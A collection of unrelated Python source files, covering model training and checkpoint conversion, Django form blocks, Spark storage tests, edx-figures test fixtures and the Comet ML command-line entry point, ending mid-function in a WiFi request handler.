snapshot = self.work_dir / 'snapshot.pt'
with snapshot.open('rb') as f:
payload = torch.load(f)
for k, v in payload.items():
self.__dict__[k] = v
# load weights from pickle state dict
obs_shape = self.train_env.observation_spec().shape
action_shape = self.train_env.action_spec().shape
enc, repr_dim = enc_net(obs_shape, g, load_weights=True)
act = act_net(repr_dim, g, load_weights=True)
q1, q2, trunk = crit_net(
repr_dim, action_shape, g, load_weights=True, target=False)
qt1, qt2, trunkT = crit_net(
repr_dim, action_shape, g, load_weights=True, target=True)
self.agent.set_networks(g, repr_dim, enc, act,
q1, q2, qt1, qt2, trunk, trunkT)
self.agent.encoder.to(self.device)
self.agent.actor.to(self.device)
self.agent.critic.to(self.device)
self.agent.critic_target.to(self.device)
@hydra.main(config_path='cfgs', config_name='config')
def main(cfg):
from train import Workspace as W
root_dir = Path.cwd()
print('root:', root_dir)
workspace = W(cfg)
snapshot = root_dir / 'snapshot.pt'
if snapshot.exists():
print(f'resuming: {snapshot}')
workspace.load_snapshot()
workspace.train()
if __name__ == '__main__':
main()
|
<reponame>appsembler/edx-figures<filename>tests/conftest.py<gh_stars>0
from __future__ import absolute_import
from datetime import datetime
import pytest
from django.utils.timezone import utc
from six.moves import range
from tests.helpers import organizations_support_sites
from tests.factories import (
CourseEnrollmentFactory,
CourseOverviewFactory,
OrganizationFactory,
OrganizationCourseFactory,
StudentModuleFactory,
SiteFactory,
UserFactory,
)
if organizations_support_sites():
from tests.factories import UserOrganizationMappingFactory
def map_users_to_org(org, users):
[UserOrganizationMappingFactory(user=user,
organization=org) for user in users]
@pytest.fixture
@pytest.mark.django_db
def sm_test_data(db):
"""
WIP StudentModule test data to test MAU
"""
year_for = 2019
month_for = 10
created_date = datetime(year_for, month_for, 1).replace(tzinfo=utc)
modified_date = datetime(year_for, month_for, 10).replace(tzinfo=utc)
course_overviews = [CourseOverviewFactory() for i in range(3)]
site = SiteFactory()
sm = []
for co in course_overviews:
sm += [StudentModuleFactory(course_id=co.id,
created=created_date,
modified=modified_date) for co in course_overviews]
if organizations_support_sites():
org = OrganizationFactory(sites=[site])
for co in course_overviews:
OrganizationCourseFactory(organization=org, course_id=str(co.id))
for rec in sm:
UserOrganizationMappingFactory(user=rec.student, organization=org)
else:
org = OrganizationFactory()
return dict(site=site,
organization=org,
course_overviews=course_overviews,
student_modules=sm,
year_for=year_for,
month_for=month_for)
@pytest.mark.django_db
def make_site_data(num_users=3, num_courses=2, create_enrollments=True):
site = SiteFactory()
if organizations_support_sites():
org = OrganizationFactory(sites=[site])
else:
org = OrganizationFactory()
courses = [CourseOverviewFactory() for i in range(num_courses)]
users = [UserFactory() for i in range(num_users)]
enrollments = []
users = [UserFactory() for i in range(num_users)]
if create_enrollments:
enrollments = []
for i, user in enumerate(users):
# Create increasing number of enrollments for each user, maximum to one less
# than the number of courses
for j in range(i):
enrollments.append(
CourseEnrollmentFactory(course=courses[j-1], user=user)
)
if organizations_support_sites():
for course in courses:
OrganizationCourseFactory(organization=org,
course_id=str(course.id))
# Set up user mappings
map_users_to_org(org, users)
data = dict(
site=site,
org=org,
courses=courses,
users=users,
enrollments=enrollments,
)
if create_enrollments:
data['enrollments'] = enrollments
return data
@pytest.fixture
@pytest.mark.django_db
def lm_test_data(db, settings):
"""Learner Metrics Test Data
user0 not enrolled in any courses
user1 enrolled in 1 course
user2 enrolled in 2 courses
"""
if organizations_support_sites():
settings.FEATURES['FIGURES_IS_MULTISITE'] = True
our_site_data = make_site_data()
other_site_data = make_site_data()
return dict(us=our_site_data, them=other_site_data)
|
import uuid
from collections import OrderedDict, defaultdict
from collections.abc import Sequence
from uuid import uuid4
from django import forms
from django.core.exceptions import NON_FIELD_ERRORS, ValidationError
from django.forms.utils import ErrorList
from django.utils.functional import cached_property
from django.utils.html import format_html_join
from django.utils.translation import ugettext as _
from ..exceptions import RemovedError
from ..widgets import BlockData
from .base import Block, BoundBlock, DeclarativeSubBlocksMetaclass
__all__ = [
"BaseStreamBlock",
"StreamBlock",
"StreamValue",
"StreamBlockValidationError",
]
class StreamBlockValidationError(ValidationError):
def __init__(self, block_errors=None, non_block_errors=None):
params = {}
if block_errors:
params.update(block_errors)
if non_block_errors:
params[NON_FIELD_ERRORS] = non_block_errors
super().__init__("Validation error in StreamBlock", params=params)
class BaseStreamBlock(Block):
def __init__(self, local_blocks=None, **kwargs):
self._constructor_kwargs = kwargs
super().__init__(**kwargs)
# create a local (shallow) copy of base_blocks so that it can be supplemented by local_blocks
self.child_blocks = self.base_blocks.copy()
if local_blocks:
for name, block in local_blocks:
block.set_name(name)
self.child_blocks[name] = block
self.dependencies = self.child_blocks.values()
@cached_property
def definition(self):
definition = super(BaseStreamBlock, self).definition
definition.update(
children=[
child_block.definition for child_block in self.child_blocks.values()
],
minNum=self.meta.min_num,
maxNum=self.meta.max_num,
)
html = self.get_instance_html([])
if html is not None:
definition["html"] = html
return definition
def get_default(self):
"""
Default values set on a StreamBlock should be a list of (type_name, value) tuples -
we can't use StreamValue directly, because that would require a reference back to
the StreamBlock that hasn't been built yet.
For consistency, then, we need to convert it to a StreamValue here for StreamBlock
to work with.
"""
return StreamValue(self, self.meta.default)
def sorted_child_blocks(self):
raise RemovedError
def render_list_member(self, *args, **kwargs):
raise RemovedError
def html_declarations(self):
raise RemovedError
@property
def media(self):
return forms.Media(
js=[
"django_react_streamfield/js/blocks/sequence.js",
"django_react_streamfield/js/blocks/stream.js",
]
)
def js_initializer(self):
raise RemovedError
def render_form(self, *args, **kwargs):
raise RemovedError
def value_from_datadict(self, data, files, prefix):
return StreamValue(
self,
[
(
child_block_data["type"],
self.child_blocks[child_block_data["type"]].value_from_datadict(
child_block_data, files, prefix,
),
child_block_data.get("id", str(uuid4())),
)
for child_block_data in data["value"]
if child_block_data["type"] in self.child_blocks
],
)
def get_definition(self):
definition = super(BaseStreamBlock, self).get_definition()
definition.update(
children=[
child_block.get_definition()
for child_block in self.child_blocks.values()
],
minNum=self.meta.min_num,
maxNum=self.meta.max_num,
)
html = self.get_blocks_container_html()
if html is not None:
definition["html"] = html
return definition
def prepare_value(self, value, errors=None):
if value is None:
return []
children_errors = self.get_children_errors(errors)
if children_errors is None:
children_errors = {}
prepared_value = []
for i, stream_child in enumerate(value):
child_errors = children_errors.get(i)
child_block = stream_child.block
child_value = stream_child.value
html = child_block.get_instance_html(child_value, errors=child_errors)
child_value = BlockData(
{
"id": stream_child.id or str(uuid4()),
"type": child_block.name,
"hasError": bool(child_errors),
"value": child_block.prepare_value(
child_value, errors=child_errors
),
}
)
if html is not None:
child_value["html"] = html
prepared_value.append(child_value)
return prepared_value
def value_omitted_from_data(self, data, files, prefix):
return data.get("value") is None
@property
def required(self):
return self.meta.required
def clean(self, value):
cleaned_data = []
errors = {}
non_block_errors = ErrorList()
for i, child in enumerate(value): # child is a StreamChild instance
try:
cleaned_data.append(
(child.block.name, child.block.clean(child.value), child.id)
)
except ValidationError as e:
errors[i] = ErrorList([e])
if self.meta.min_num is not None and self.meta.min_num > len(value):
non_block_errors.append(
ValidationError(
_("The minimum number of items is %d") % self.meta.min_num
)
)
elif self.required and len(value) == 0:
non_block_errors.append(ValidationError(_("This field is required.")))
if self.meta.max_num is not None and self.meta.max_num < len(value):
non_block_errors.append(
ValidationError(
_("The maximum number of items is %d") % self.meta.max_num
)
)
if self.meta.block_counts:
block_counts = defaultdict(int)
for item in value:
block_counts[item.block_type] += 1
for block_name, min_max in self.meta.block_counts.items():
block = self.child_blocks[block_name]
max_num = min_max.get("max_num", None)
min_num = min_max.get("min_num", None)
block_count = block_counts[block_name]
if min_num is not None and min_num > block_count:
non_block_errors.append(
ValidationError(
"{}: {}".format(
block.label,
_("The minimum number of items is %d") % min_num,
)
)
)
if max_num is not None and max_num < block_count:
non_block_errors.append(
ValidationError(
"{}: {}".format(
block.label,
_("The maximum number of items is %d") % max_num,
)
)
)
if errors or non_block_errors:
# The message here is arbitrary - outputting error messages is delegated to the child blocks,
# which only involves the 'params' list
raise StreamBlockValidationError(
block_errors=errors, non_block_errors=non_block_errors
)
return StreamValue(self, cleaned_data)
def to_python(self, value):
# the incoming JSONish representation is a list of dicts, each with a 'type' and 'value' field
# (and possibly an 'id' too).
# This is passed to StreamValue to be expanded lazily - but first we reject any unrecognised
# block types from the list
return StreamValue(
self,
[
child_data
for child_data in value
if child_data["type"] in self.child_blocks
],
is_lazy=True,
)
def get_prep_value(self, value):
if not value:
# Falsy values (including None, empty string, empty list, and
# empty StreamValue) become an empty stream
return []
else:
# value is a StreamValue - delegate to its get_prep_value() method
# (which has special-case handling for lazy StreamValues to avoid useless
# round-trips to the full data representation and back)
return value.get_prep_value()
def get_api_representation(self, value, context=None):
if value is None:
# treat None as identical to an empty stream
return []
return [
{
"type": child.block.name,
"value": child.block.get_api_representation(
child.value, context=context
),
"id": child.id,
}
for child in value # child is a StreamChild instance
]
def render_basic(self, value, context=None):
return format_html_join(
"\n",
'<div class="block-{1}">{0}</div>',
[(child.render(context=context), child.block_type) for child in value],
)
def get_searchable_content(self, value):
content = []
for child in value:
content.extend(child.block.get_searchable_content(child.value))
return content
def deconstruct(self):
"""
Always deconstruct StreamBlock instances as if they were plain StreamBlocks with all of the
field definitions passed to the constructor - even if in reality this is a subclass of StreamBlock
with the fields defined declaratively, or some combination of the two.
This ensures that the field definitions get frozen into migrations, rather than leaving a reference
to a custom subclass in the user's models.py that may or may not stick around.
"""
path = "django_react_streamfield.blocks.StreamBlock"
args = [list(self.child_blocks.items())]
kwargs = self._constructor_kwargs
return (path, args, kwargs)
def check(self, **kwargs):
errors = super().check(**kwargs)
for name, child_block in self.child_blocks.items():
errors.extend(child_block.check(**kwargs))
errors.extend(child_block._check_name(**kwargs))
return errors
class Meta:
# No icon specified here, because that depends on the purpose that the
# block is being used for. Feel encouraged to specify an icon in your
# descendant block type
icon = "placeholder"
default = []
required = True
min_num = None
max_num = None
block_counts = {}
class StreamBlock(BaseStreamBlock, metaclass=DeclarativeSubBlocksMetaclass):
pass
class StreamValue(Sequence):
"""
Custom type used to represent the value of a StreamBlock; behaves as a sequence of BoundBlocks
(which keep track of block types in a way that the values alone wouldn't).
"""
class StreamChild(BoundBlock):
"""
Extends BoundBlock with methods that make logical sense in the context of
children of StreamField, but not necessarily elsewhere that BoundBlock is used
"""
def __init__(self, *args, **kwargs):
self.id = kwargs.pop("id")
super(StreamValue.StreamChild, self).__init__(*args, **kwargs)
@property
def block_type(self):
"""
Syntactic sugar so that we can say child.block_type instead of child.block.name.
(This doesn't belong on BoundBlock itself because the idea of block.name denoting
the child's "type" ('heading', 'paragraph' etc) is unique to StreamBlock, and in the
wider context people are liable to confuse it with the block class (CharBlock etc).
"""
return self.block.name
def __init__(self, stream_block, stream_data, is_lazy=False, raw_text=None):
"""
Construct a StreamValue linked to the given StreamBlock,
with child values given in stream_data.
Passing is_lazy=True means that stream_data is raw JSONish data as stored
in the database, and needs to be converted to native values
(using block.to_python()) when accessed. In this mode, stream_data is a
list of dicts, each containing 'type' and 'value' keys.
Passing is_lazy=False means that stream_data consists of immediately usable
native values. In this mode, stream_data is a list of (type_name, value)
or (type_name, value, id) tuples.
raw_text exists solely as a way of representing StreamField content that is
not valid JSON; this may legitimately occur if an existing text field is
migrated to a StreamField. In this situation we return a blank StreamValue
with the raw text accessible under the `raw_text` attribute, so that migration
code can be rewritten to convert it as desired.
"""
self.is_lazy = is_lazy
self.stream_block = (
stream_block # the StreamBlock object that handles this value
)
self.stream_data = stream_data # a list of (type_name, value) tuples
self._bound_blocks = (
{}
) # populated lazily from stream_data as we access items through __getitem__
self.raw_text = raw_text
def __getitem__(self, i):
if i not in self._bound_blocks:
if self.is_lazy:
raw_value = self.stream_data[i]
type_name = raw_value["type"]
child_block = self.stream_block.child_blocks[type_name]
if hasattr(child_block, "bulk_to_python"):
self._prefetch_blocks(type_name, child_block)
return self._bound_blocks[i]
else:
value = child_block.to_python(raw_value["value"])
block_id = raw_value.get("id")
else:
try:
type_name, value, block_id = self.stream_data[i]
except ValueError:
type_name, value = self.stream_data[i]
block_id = None
child_block = self.stream_block.child_blocks[type_name]
self._bound_blocks[i] = StreamValue.StreamChild(
child_block, value, id=block_id
)
return self._bound_blocks[i]
def _prefetch_blocks(self, type_name, child_block):
"""Prefetch all child blocks for the given `type_name` using the
given `child_blocks`.
This prevents n queries for n blocks of a specific type.
"""
# create a mapping of all the child blocks matching the given block type,
# mapping (index within the stream) => (raw block value)
raw_values = OrderedDict(
(i, item["value"])
for i, item in enumerate(self.stream_data)
if item["type"] == type_name
)
# pass the raw block values to bulk_to_python as a list
converted_values = child_block.bulk_to_python(raw_values.values())
# reunite the converted values with their stream indexes
for i, value in zip(raw_values.keys(), converted_values):
# also pass the block ID to StreamChild, if one exists for this stream index
block_id = self.stream_data[i].get("id")
self._bound_blocks[i] = StreamValue.StreamChild(
child_block, value, id=block_id
)
def get_prep_value(self):
prep_value = []
for i, stream_data_item in enumerate(self.stream_data):
if self.is_lazy and i not in self._bound_blocks:
# This child has not been accessed as a bound block, so its raw JSONish
# value (stream_data_item here) is still valid
prep_value_item = stream_data_item
# As this method is preparing this value to be saved to the database,
# this is an appropriate place to ensure that each block has a unique id.
prep_value_item["id"] = prep_value_item.get("id", str(uuid.uuid4()))
else:
# convert the bound block back into JSONish data
child = self[i]
# As this method is preparing this value to be saved to the database,
# this is an appropriate place to ensure that each block has a unique id.
child.id = child.id or str(uuid.uuid4())
prep_value_item = {
"type": child.block.name,
"value": child.block.get_prep_value(child.value),
"id": child.id,
}
prep_value.append(prep_value_item)
return prep_value
def __eq__(self, other):
if not isinstance(other, StreamValue):
return False
return self.stream_data == other.stream_data
def __len__(self):
return len(self.stream_data)
def __repr__(self):
return repr(list(self))
def render_as_block(self, context=None):
return self.stream_block.render(self, context=context)
def __html__(self):
return self.stream_block.render(self)
def __str__(self):
return self.__html__()
|
# Copyright (c) 2020, eQualit.ie inc.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
from unittest import mock
import pyspark.sql.functions as F
from datetime import datetime
from dateutil.tz import tzutc
from undecorated import undecorated
from sparktestingbase.sqltestcase import SQLTestCase
class TestEsStorage(SQLTestCase):
def setUp(self):
super(TestEsStorage, self).setUp()
self.patcher = mock.patch('es_retriever.spark.get_or_create_spark_session')
self.mock_session = self.patcher.start()
def tearDown(self):
self.patcher.stop()
def test_instance(self):
from es_retriever.es.storage import EsStorage
from es_retriever.config import Config
self.config = Config()
es_storage = EsStorage(
self.config,
session_getter=self.mock_session
)
self.assertTrue(hasattr(es_storage, 'base_index'))
self.assertTrue(hasattr(es_storage, 'index_type'))
self.assertTrue(hasattr(es_storage, 'es_read_config'))
self.assertTrue(hasattr(es_storage, 'time_formatter'))
self.assertTrue(hasattr(es_storage, 'timestamp_column'))
self.assertTrue(hasattr(es_storage, 'cluster_status_to_color'))
self.assertEqual(es_storage.format, 'org.elasticsearch.spark.sql')
self.assertEqual(es_storage.session_getter, self.mock_session)
self.assertEqual(es_storage.config, self.config)
def test_get_no_filter_condition(self):
from es_retriever.es.storage import EsStorage
from es_retriever.config import Config
self.config = Config(
es_base_index='test_index',
es_index_type='test_type'
)
es_storage = EsStorage(
self.config,
session_getter=self.mock_session
)
since = datetime(2018, 1, 1, 10, 35, 00).replace(tzinfo=tzutc())
until = datetime(2018, 1, 2, 13, 35, 00).replace(tzinfo=tzutc())
undecorated(es_storage.get)(es_storage, since, until)
format = self.mock_session.return_value.read.format
options = format.return_value.options
load = options.return_value.load
df_ = load.return_value
format.assert_called_once_with(
'org.elasticsearch.spark.sql'
)
options.assert_called_once_with(
**es_storage.es_read_config
)
load.assert_called_once_with(
'test_index-2018.01.01,test_index-2018.01.02/test_type'
)
df_.filter.assert_called_once()
# df_ = df_.filter.return_value
columns = df_.columns
df_.filter.return_value.select.assert_called_once_with(columns)
def test_get_with_filter_condition(self):
from es_retriever.es.storage import EsStorage
from es_retriever.config import Config
mock_filter = mock.MagicMock()
self.config = Config(
es_base_index='test_index',
es_index_type='test_type'
)
es_storage = EsStorage(
self.config,
session_getter=self.mock_session,
)
since = datetime(2018, 1, 1, 10, 35, 00).replace(tzinfo=tzutc())
until = datetime(2018, 1, 2, 13, 35, 00).replace(tzinfo=tzutc())
date_time_filter = (F.col('@timestamp') >= since) & \
(F.col('@timestamp') <= until)
undecorated(es_storage.get)(
es_storage,
since,
until,
filter_condition=mock_filter
)
format = self.mock_session.return_value.read.format
options = format.return_value.options
load = options.return_value.load
df_ = load.return_value
format.assert_called_once_with(
'org.elasticsearch.spark.sql'
)
options.assert_called_once_with(
**es_storage.es_read_config
)
load.assert_called_once_with(
'test_index-2018.01.01,test_index-2018.01.02/test_type'
)
df_.filter.assert_called_once()
df_.filter.assert_called_once_with(mock_filter & date_time_filter)
df_ = df_.filter.return_value
columns = df_.columns
df_.select.assert_called_once_with(columns)
def test_get_with_extra_config(self):
from es_retriever.es.storage import EsStorage
from es_retriever.config import Config
extra_config = {'test1': 'test_value1'}
self.config = Config(
es_base_index='test_index',
es_index_type='test_type'
)
es_storage = EsStorage(
self.config,
session_getter=self.mock_session,
)
since = datetime(2018, 1, 1, 10, 35, 00).replace(tzinfo=tzutc())
until = datetime(2018, 1, 2, 13, 35, 00).replace(tzinfo=tzutc())
undecorated(es_storage.get)(
es_storage,
since,
until,
extra_config=extra_config
)
format = self.mock_session.return_value.read.format
options = format.return_value.options
load = options.return_value.load
df_ = load.return_value
config = es_storage.es_read_config.copy()
config.update(extra_config)
format.assert_called_once_with(
'org.elasticsearch.spark.sql'
)
options.assert_called_once_with(
**config
)
load.assert_called_once_with(
'test_index-2018.01.01,test_index-2018.01.02/test_type'
)
df_.filter.assert_called_once()
df_ = df_.filter.return_value
columns = df_.columns
df_.select.assert_called_once_with(columns)
|
import sys
import time
from multiprocessing import Process, Queue
import yaml
import numpy as np
import zmq
import logging
# set up logging to file - see previous section for more details
from datetime import datetime
logging.basicConfig(level=logging.INFO,
format='%(asctime)s - %(message)s',
datefmt='%y-%m-%d %H:%M:%S',
filename='./alexnet_time_tmp.log',
filemode='w')
# define a Handler which writes INFO messages or higher to the sys.stderr
console = logging.StreamHandler()
console.setLevel(logging.INFO)
# set a format which is simpler for console use
formatter = logging.Formatter('%(message)s')
# tell the handler to use this format
console.setFormatter(formatter)
# add the handler to the root logger
logging.getLogger('').addHandler(console)
# Now, define a couple of other loggers which might represent areas in your
# application:
logger = logging.getLogger('AlexNet.timming')
sys.path.append('./lib')
from tools import (save_weights, load_weights,
save_momentums, load_momentums)
from train_funcs import (unpack_configs, adjust_learning_rate,
get_val_error_loss, get_rand3d, train_model_wrap,
proc_configs)
def train_net(config):
# UNPACK CONFIGS
(flag_para_load, train_filenames, val_filenames,
train_labels, val_labels, img_mean) = unpack_configs(config)
if flag_para_load:
# zmq set up
sock = zmq.Context().socket(zmq.PAIR)
sock.connect('tcp://localhost:{0}'.format(config['sock_data']))
load_send_queue = config['queue_t2l']
load_recv_queue = config['queue_l2t']
else:
load_send_queue = None
load_recv_queue = None
import theano
theano.config.on_unused_input = 'warn'
if config['flag_top_5']:
flag_top5 = True
else:
flag_top5 = False
from layers import DropoutLayer
from alex_net import AlexNet, compile_models
## BUILD NETWORK ##
model = AlexNet(config)
layers = model.layers
batch_size = model.batch_size
## COMPILE FUNCTIONS ##
(train_model, validate_model, train_error, learning_rate,
shared_x, shared_y, rand_arr, vels) = compile_models(model, config, flag_top_5=flag_top5)
######################### TRAIN MODEL ################################
print '... training'
if flag_para_load:
sock.send_pyobj((shared_x))
load_send_queue.put(img_mean)
n_train_batches = len(train_filenames)
minibatch_range = range(n_train_batches)
# Start Training Loop
epoch = 0
step_idx = 0
val_record = []
while epoch < config['n_epochs']:
epoch = epoch + 1
if config['shuffle']:
print ('shuffle')
np.random.shuffle(minibatch_range)
if config['resume_train'] and epoch == 1:
print ('config')
load_epoch = config['load_epoch']
load_weights(layers, config['weights_dir'], load_epoch)
lr_to_load = np.load(
config['weights_dir'] + 'lr_' + str(load_epoch) + '.npy')
learning_rate.set_value(lr_to_load)
#val_record = list(
# np.load(config['weights_dir'] + 'val_record.npy'))
load_momentums(vels, config['weights_dir'], load_epoch)
epoch = load_epoch + 1
if flag_para_load:
print ('flag_para_load')
# send the initial message to load data, before each epoch
load_send_queue.put(str(train_filenames[minibatch_range[0]]))
load_send_queue.put(get_rand3d())
# clear the sync before 1st calc
load_send_queue.put('calc_finished')
count = 0
for minibatch_index in minibatch_range:
num_iter = (epoch - 1) * n_train_batches + count
count = count + 1
if count == 1:
s = time.time()
if count == 20:
e = time.time()
print "time per 20 iter:", (e - s)
logger.info("time per 20 iter: %lf" % (e - s))
cost_ij = train_model_wrap(train_model, shared_x,
shared_y, rand_arr, img_mean,
count, minibatch_index,
minibatch_range, batch_size,
train_filenames, train_labels,
flag_para_load,
config['batch_crop_mirror'],
send_queue=load_send_queue,
recv_queue=load_recv_queue)
if num_iter % config['print_freq'] == 0:
logger.info("training @ iter = %i" % (num_iter))
logger.info("training cost: %lf" % (cost_ij))
if config['print_train_error']:
logger.info('training error rate: %lf' % train_error())
if flag_para_load and (count < len(minibatch_range)):
load_send_queue.put('calc_finished')
############### Test on Validation Set ##################
#"""
DropoutLayer.SetDropoutOff()
result_list = get_val_error_loss(
rand_arr, shared_x, shared_y,
val_filenames, val_labels,
flag_para_load, img_mean,
batch_size, validate_model,
send_queue=load_send_queue,
recv_queue=load_recv_queue,
flag_top_5=flag_top5)
logger.info(('epoch %i: validation loss %f ' %
(epoch, result_list[-1])))
if flag_top5:
logger.info(('epoch %i: validation error (top 1) %f %%, (top5) %f %%' %
(epoch, result_list[0] * 100., result_list[1] * 100.)))
else:
logger.info(('epoch %i: validation error %f %%' %
(epoch, result_list[0] * 100.)))
val_record.append(result_list)
np.save(config['weights_dir'] + 'val_record.npy', val_record)
DropoutLayer.SetDropoutOn()
############################################
# Adapt Learning Rate
step_idx = adjust_learning_rate(config, epoch, step_idx,
val_record, learning_rate)
# Save weights
if epoch % config['snapshot_freq'] == 0:
save_weights(layers, config['weights_dir'], epoch)
np.save(config['weights_dir'] + 'lr_' + str(epoch) + '.npy',
learning_rate.get_value())
save_momentums(vels, config['weights_dir'], epoch)
#"""
print('Optimization complete.')
if __name__ == '__main__':
with open('config.yaml', 'r') as f:
config = yaml.load(f)
with open('spec.yaml', 'r') as f:
config = dict(config.items() + yaml.load(f).items())
config = proc_configs(config)
if config['para_load']:
from proc_load import fun_load
config['queue_l2t'] = Queue(1)
config['queue_t2l'] = Queue(1)
train_proc = Process(target=train_net, args=(config,))
print 'config : ',config
load_proc = Process(
target=fun_load, args=(config, config['sock_data']))
train_proc.start()
load_proc.start()
train_proc.join()
load_proc.join()
else:
"""
train_proc = Process(target=train_net, args=(config,))
train_proc.start()
train_proc.join()
"""
train_net(config)
|
<reponame>mindspore-ai/models<filename>research/cv/midas/src/utils/pth2ckpt.py
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""pth2ckpt."""
import sys
from mindspore import Tensor
from mindspore.train.serialization import save_checkpoint
import torch
import numpy as np
def pytorch2mindspore():
"""pth to ckpt."""
par_dict = torch.load(sys.argv[1], map_location='cpu')
new_params_list = []
for name in par_dict:
print(name)
param_dict = {}
parameter = par_dict[name]
name = name.replace('layer', 'backbone_layer', 1)
name = name.replace('running_mean', 'moving_mean', 1)
name = name.replace('running_var', 'moving_variance', 1)
temp = name
if name.endswith('conv2.weight'):
x = parameter.numpy()
y = np.split(x, 32)
for i in range(32):
name = temp[:temp.rfind('weight')] + 'convs.' + str(i) + '.weight'
data = Tensor(y[i])
new_params_list.append({"name": name, 'data': data})
continue
if name.startswith('bn1'):
name = name.replace('bn1', 'backbone_bn', 1)
name = name.replace('bias', 'beta', 1)
name = name.replace('weight', 'gamma', 1)
if name.startswith('conv1.weight'):
name = 'backbone_conv.weight'
if name.endswith('layer1.0.weight'):
name = 'backbone_conv.weight'
if name.endswith('layer1.1.weight'):
name = 'backbone_bn.gamma'
if name.endswith('layer1.1.bias'):
name = 'backbone_bn.beta'
if name.endswith('bn1.weight'):
name = name[:name.rfind('weight')]
name = name + 'gamma'
if name.endswith('bn1.bias'):
name = name[:name.rfind('bias')]
name = name + 'beta'
if name.endswith('bn2.weight'):
name = name[:name.rfind('weight')]
name = name + 'gamma'
if name.endswith('bn2.bias'):
name = name[:name.rfind('bias')]
name = name + 'beta'
if name.endswith('bn3.weight'):
name = name[:name.rfind('weight')]
name = name + 'gamma'
if name.endswith('bn3.bias'):
name = name[:name.rfind('bias')]
name = name + 'beta'
if name.find('downsample') != -1:
name = name.replace("downsample.1", 'down_sample.bn')
name = name.replace("bn.weight", 'bn.gamma')
name = name.replace("bias", 'beta')
name = name.replace("downsample.0.weight", 'down_sample.conv.weight')
print("----------------", name)
param_dict['name'] = name
param_dict['data'] = Tensor(parameter.numpy())
new_params_list.append(param_dict)
save_checkpoint(new_params_list, 'midas_pth.ckpt')
if __name__ == '__main__':
pytorch2mindspore()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# *******************************************************
# ____ _ _
# / ___|___ _ __ ___ ___| |_ _ __ ___ | |
# | | / _ \| '_ ` _ \ / _ \ __| | '_ ` _ \| |
# | |__| (_) | | | | | | __/ |_ _| | | | | | |
# \____\___/|_| |_| |_|\___|\__(_)_| |_| |_|_|
#
# Sign up for free at http://www.comet.ml
# Copyright (C) 2015-2020 Comet ML INC
# This file can not be copied and/or distributed without
# the express permission of Comet ML Inc.
# *******************************************************
"""
Examples:
comet upload file.zip ...
comet upload --force-reupload file.zip ...
comet optimize script.py optimize.config
comet optimize -j 4 script.py optimize.config
comet optimize -j 4 script.py optimize.config -- arg1 --flag arg2
comet bootstrap_dir
comet python script.py
comet python -p /usr/bin/python3.6 script.py
comet offline 60a1a617e4c24c8998cc78fa3bc7a31b.zip
comet offline --csv 60a1a617e4c24c8998cc78fa3bc7a31b.zip
comet check
comet init
comet models
Note that `comet optimize` requires your COMET_API_KEY
be configured in the environment, or in your .comet.config
file. For example:
COMET_API_KEY=74345364546 comet optimize ...
For more information:
comet COMMAND --help
"""
from __future__ import print_function
import argparse
import os.path
import sys
from comet_ml import __version__
# Import CLI commands:
from . import (
comet_check,
comet_init,
comet_models,
comet_offline,
comet_optimize,
comet_python,
comet_upload,
)
def bootstrap_dir(args):
""" Print the bootstrap dir to include in PYTHONPATH for automatic early
SDK initialization. See also `comet python` that set it automatically.
"""
import comet_ml.bootstrap
boostrap_dir = os.path.dirname(comet_ml.bootstrap.__file__)
print(boostrap_dir, end="")
def add_subparser(subparsers, module, name):
"""
Loads scripts and creates subparser.
Assumes: NAME works for:
* comet_NAME.NAME is the function
* comet_NAME.ADDITIONAL_ARGS is set to True/False
* comet_NAME.get_parser_arguments is defined
"""
func = getattr(module, name)
additional_args = module.ADDITIONAL_ARGS
get_parser_arguments = module.get_parser_arguments
docs = module.__doc__
parser = subparsers.add_parser(
name, description=docs, formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.set_defaults(func=func)
parser.set_defaults(additional_args=additional_args)
get_parser_arguments(parser)
def main(raw_args=sys.argv[1:]):
parser = argparse.ArgumentParser(
description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter
)
parser.add_argument(
"--version",
help="Display comet_ml version",
action="store_const",
const=True,
default=False,
)
subparsers = parser.add_subparsers()
# Register CLI commands:
add_subparser(subparsers, comet_check, "check")
add_subparser(subparsers, comet_models, "models")
add_subparser(subparsers, comet_offline, "offline")
add_subparser(subparsers, comet_optimize, "optimize")
add_subparser(subparsers, comet_python, "python")
add_subparser(subparsers, comet_upload, "upload")
add_subparser(subparsers, comet_init, "init")
bootstrap_dir_parser = subparsers.add_parser(
"bootstrap_dir",
description=bootstrap_dir.__doc__,
formatter_class=argparse.RawDescriptionHelpFormatter,
)
bootstrap_dir_parser.set_defaults(func=bootstrap_dir)
bootstrap_dir_parser.set_defaults(additional_args=False)
# First identify the subparser as some subparser pass additional args to
# the subparser and other not
args, rest = parser.parse_known_args(raw_args)
# args won't have additional args if no subparser added
if hasattr(args, "additional_args") and args.additional_args:
parser_func = args.func
parser_func(args, rest)
elif args.version:
print(__version__)
else:
# If the subcommand doesn't need extra args, reparse in strict mode so
# the users get a nice message in case of unsupported CLi argument
args = parser.parse_args(raw_args)
if hasattr(args, "func"):
parser_func = args.func
parser_func(args)
else:
# comet with no args; call recursively:
main(["--help"])
if __name__ == "__main__":
main(sys.argv[1:])
|
from json import loads
from controller import BaseHandler
from logging import info, exception
from controller import Net
from module import DbManager, add_user, delete_user, update_user, set_api_response, validate_format, get_string, wifi_ap_info
class WiFiInfo(BaseHandler):
tipo_operazione = ['list', 'update']
def post(self):
body = str(self.request.body)[2:-1]
info("%s %s", self.request.method, self.request.url)
info("BODY %s", body)
response = {}
try:
response = WiFiInfo.check(self.session.get('user'), self.session.get('role'), self.request, body)
if response['output'] == 'OK':
data = self.request.json
tipo_operazione = data['tipo_operazione']
wifi = None
if 'wifi' in data:
wifi = data['wifi']
funzioni = {
'list': WiFiInfo.wifi_list,
'update': WiFiInfo.wifi_update,
}
parametri = {
'list': [],
'update': [wifi]
}
response = funzioni[tipo_operazione](*parametri[tipo_operazione])
else:
raise Exception(response['output'])
except Exception as e:
exception("Exception")
response['output'] = str(e)
finally:
